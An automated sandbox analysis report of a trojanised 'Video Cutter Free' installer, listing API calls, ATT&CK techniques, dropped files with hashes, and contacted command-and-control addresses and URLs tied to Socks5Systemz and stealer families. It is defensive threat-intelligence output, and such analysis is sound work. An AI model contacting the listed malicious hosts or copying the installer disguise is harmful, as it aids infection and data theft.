                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,5_2_609255D4
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609255FF sqlite3_bind_text,5_2_609255FF
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,5_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,5_2_6094B54C
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,5_2_60925686
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,5_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,5_2_609256E5
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,5_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6092562A sqlite3_bind_blob,5_2_6092562A
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,5_2_60925655
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,5_2_6094C64A
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,5_2_609687A7
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,5_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,5_2_6092570B
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095F772
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,5_2_60925778
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6090577D sqlite3_bind_parameter_name,5_2_6090577D
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,5_2_6094B764
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6090576B sqlite3_bind_parameter_count,5_2_6090576B
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,5_2_6094A894
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095F883
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,5_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,5_2_6096281E
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,5_2_6096583A
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,5_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6094A92B
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6090EAE5 sqlite3_transfer_bindings,5_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,5_2_6095FB98
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,5_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,5_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,5_2_60966DF1
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_60969D75
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exeCode function: 5_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,5_2_6095FFB2
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Service Execution
                    5
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Obfuscated Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol1
                    Input Capture
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Bootkit
                    1
                    Access Token Manipulation
                    22
                    Software Packing
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
                    Windows Service
                    1
                    DLL Side-Loading
                    NTDS35
                    System Information Discovery
                    Distributed Component Object ModelInput Capture1
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets41
                    Security Software Discovery
                    SSHKeylogging12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials1
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync21
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                    Process Injection
                    Proc Filesystem1
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Bootkit
                    /etc/passwd and /etc/shadow3
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    imMQqf6YWk.exe24%ReversingLabsWin32.Trojan.Munp
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe100%Joe Sandbox ML
                    C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe100%Joe Sandbox ML
                    C:\ProgramData\DVCMediaPlugin\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp3%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_setup64.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\LTDIS13n.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\gdiplus.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-19B75.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-2IP8E.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-IBF1C.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-J7MTP.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-JSB39.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-LDIKA.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-PTGV1.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\ltkrn13n.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\msvcp71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\msvcr71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\sqlite3.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.dll (copy)0%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://188.119.66.185/80%Avira URL Cloudsafe
                    https://188.119.66.185/en-GB0%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c40%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4ce71bc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad0388fd3d5965e0%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021ddd3b271ed4328f0%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b3250%Avira URL Cloudsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021ddd3b271ed4328ffalse
                    • Avira URL Cloud: safe
                    unknown
                    https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4ce71bc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad0388fd3d5965efalse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.innosetup.com/imMQqf6YWk.tmp, imMQqf6YWk.tmp, 00000001.00000000.2013110309.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-LRS1N.tmp.1.dr, imMQqf6YWk.tmp.0.drfalse
                      high
                      http://www.remobjects.com/psUimMQqf6YWk.exe, 00000000.00000003.2012312615.0000000002158000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2012131202.0000000002380000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000000.2013110309.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-LRS1N.tmp.1.dr, imMQqf6YWk.tmp.0.drfalse
                        high
                        http://www.remobjects.com/psimMQqf6YWk.exe, 00000000.00000003.2012312615.0000000002158000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2012131202.0000000002380000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, imMQqf6YWk.tmp, 00000001.00000000.2013110309.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-LRS1N.tmp.1.dr, imMQqf6YWk.tmp.0.drfalse
                          high
                          https://www.easycutstudio.com/support.htmlimMQqf6YWk.exe, 00000000.00000002.3874000805.0000000002151000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2011773117.0000000002151000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.exe, 00000000.00000003.2011705088.0000000002380000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000002.3874072222.0000000000832000.00000004.00000020.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000003.2013945725.0000000003230000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000002.3874349520.0000000002358000.00000004.00001000.00020000.00000000.sdmp, imMQqf6YWk.tmp, 00000001.00000003.2014010509.0000000002358000.00000004.00001000.00020000.00000000.sdmpfalse
                            high
                            https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b92a8dcd6c946a4fbd41879e7c4videocutterfree.exe, 00000005.00000002.3874926537.000000000358B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://188.119.66.185/ai/?key=8f3f2b3ae115416b731ce2a8231e72eee7c4db7e40b82a8dcd6c946851e300888b325videocutterfree.exe, 00000005.00000002.3874287343.0000000000C08000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://188.119.66.185/8videocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://188.119.66.185/videocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, videocutterfree.exe, 00000005.00000002.3874926537.000000000358B000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://188.119.66.185/en-GBvideocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              31.214.157.206
                              unknownGermany
                              58329RACKPLACEDEfalse
                              188.119.66.185
                              unknownRussian Federation
                              209499FLYNETRUfalse
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1572393
                              Start date and time:2024-12-10 14:33:33 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 6s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Run name:Run with higher sleep bypass
                              Number of analysed new started processes analysed:9
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:imMQqf6YWk.exe
                              renamed because original name is a hash value
                              Original Sample Name:c9019cfc066b4cf4439ab3fa00ae3ac9.exe
                              Detection:MAL
                              Classification:mal84.troj.evad.winEXE@10/30@0/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 92%
                              • Number of executed functions: 206
                              • Number of non-executed functions: 296
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: imMQqf6YWk.exe
                              No simulations
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              31.214.157.206file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                    file.exeGet hashmaliciousSocks5SystemzBrowse
                                      file.exeGet hashmaliciousSocks5SystemzBrowse
                                        188.119.66.185file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                            file.exeGet hashmaliciousSocks5SystemzBrowse
                                              file.exeGet hashmaliciousSocks5SystemzBrowse
                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                    file.exeGet hashmaliciousSocks5SystemzBrowse
                                                      file.exeGet hashmaliciousSocks5SystemzBrowse
                                                        NLtIe7ZgkL.exeGet hashmaliciousSocks5SystemzBrowse
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          RACKPLACEDEfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                          • 31.214.157.206
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 31.214.157.206
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 31.214.157.206
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 31.214.157.206
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 31.214.157.206
                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                          • 31.214.157.124
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                          • 31.214.157.226
                                                          .gov.ua.htmlGet hashmaliciousUnknownBrowse
                                                          • 31.214.157.49
                                                          .gov.ua.htmlGet hashmaliciousUnknownBrowse
                                                          • 31.214.157.49
                                                          FLYNETRUfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9Get hashmaliciousUnknownBrowse
                                                          • 188.119.66.154
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          51c64c77e60f3980eea90869b68c58a817Xmvtq2Tq.exeGet hashmaliciousVidarBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                          • 188.119.66.185
                                                          file.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 188.119.66.185
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\ProgramData\DVCMediaPlugin\sqlite3.dllfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                            file.exeGet hashmaliciousSocks5SystemzBrowse
                                                              file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          NLtIe7ZgkL.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            Process:C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4005103
                                                                            Entropy (8bit):6.385094908393869
                                                                            Encrypted:false
                                                                            SSDEEP:49152:BTUC8iCySyQWcZTGswsorvEmYZv71CCxOPSCgauYWMZsUgT43tG8V:hOW0TGswssgv71CjPSCgaupMZa4T
                                                                            MD5:F00EE01B4436F8DD28084F015B123ECC
                                                                            SHA1:C3C00505968617B33BF22C2955CA882B2B7E0810
                                                                            SHA-256:7F99B4F27FF33CFCA71F5E5B6645D2DD6F3D0D65CD97421F55317501B444D236
                                                                            SHA-512:BB9B5E2726BB34088D05C1AEA76FDA6973D8349E8F963FA5EFE02347F89F33D1AA69469BF5DBAFBFB255F8CE5E5540867E3027B1FEA3B512BD2ABF04E248DDC0
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Reputation:low
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............E...E...E...E...Eu..E...E...E...E...E...E...E ..E.onE...E...E...E1..E...ERich...E........PE..L.....Wg.............................O............@...........................=.....R.=.....................................$........@...!..............................................................................L............................text...z........................... ..`.rdata..$...........................@..@.data....d.......0..................@....rsrc...."...@..."..................@..@.adtt3...."..p....".................`.'.........................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):645592
                                                                            Entropy (8bit):6.50414583238337
                                                                            Encrypted:false
                                                                            SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                            MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                            SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                            SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
